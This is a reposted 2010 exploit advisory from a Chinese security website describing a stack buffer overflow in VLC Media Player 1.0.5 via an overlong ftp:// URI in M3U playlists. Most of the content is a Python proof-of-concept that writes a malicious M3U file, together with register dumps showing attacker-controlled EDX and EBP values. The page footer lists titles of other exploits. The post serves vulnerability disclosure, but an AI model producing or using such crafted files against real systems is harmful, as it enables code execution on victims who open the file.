首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VLC Media Player version 1.0.5 (Goldeneye) suffers from a remote URI handler sta
来源:praveen_recker[at]sify.com 作者:Darshanam 发布时间:2010-07-08  
There a Vulnerability in VLC Media Player v1.0.5 (Goldeneye) when handling M3U files with ftp:// URI handler.

When we open the malicious file our EDX and EBP registers point to the user supplied data which might lead to code execution.
State of the registers when we opne the malicious file is:

EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
ESI 00000000
EDI 00000000
EIP 77C47C7E msvcrt.77C47C7E
C 0  ES 0023 32bit 0(FFFFFFFF)


Attaching image for above stack trace and PoC script.

#############START PYTHON########################
import sys
import string

print "\n\n***VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow***\n"

#Tested on Microsoft Windows XP Professional SP3
# Application Vulnerable: VLC Media Player v1.0.5 (Goldeneye)
# Not Vulnerable: VLC Media Player v1.1.0 (The Luggage), Checked on windows 7

#edx register points to our data afetr 4255 bytes
buf1 = "ftp://" + "PRAV" + "\x44" * 4251
buf2 = buf1 + "A" * 4
buf3 = buf2 + "Z" * (100000-4259)

print "100000-4259 is: ", 100000-4259
print "Creating malicious M3U file . . .\n"

filem3u=open('m3uftp.m3u','w')
filem3u.write(buf3)
filem3u.close()

print "Created M3U file. Open with VLC Media Player v1.0.5 (Goldeneye)\n\n"



'''
EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
ESI 00000000
EDI 00000000
EIP 77C47C7E msvcrt.77C47C7E
C 0  ES 0023 32bit 0(FFFFFFFF)


'''
#Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)
# Praveen Darshanam
#############END PYTHON###########################
Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)

Best Regards,
Praveen Darshanam,
Security Researcher

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Qt 4.6.3 "QSslSocketBackendPri
·NetworX version 1.0.3 suffers
·EA Battlefield 2 and Battlefie
·IrcDelphi Daemon Server Denial
·FathFTP 1.7 ActiveX Buffer Ove
·ARM Polymorphic execve("/bin/s
·UFO: Alien Invasion v2.2.1 IRC
·GSM SIM Utility Local Exploit
·Ubuntu PAM MOTD File Tampering
·Hero DVD Remote Buffer Overflo
·91 bytes Find all writeable fo
·HP NNM 7.53 ovwebsnmpsrv.exe B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved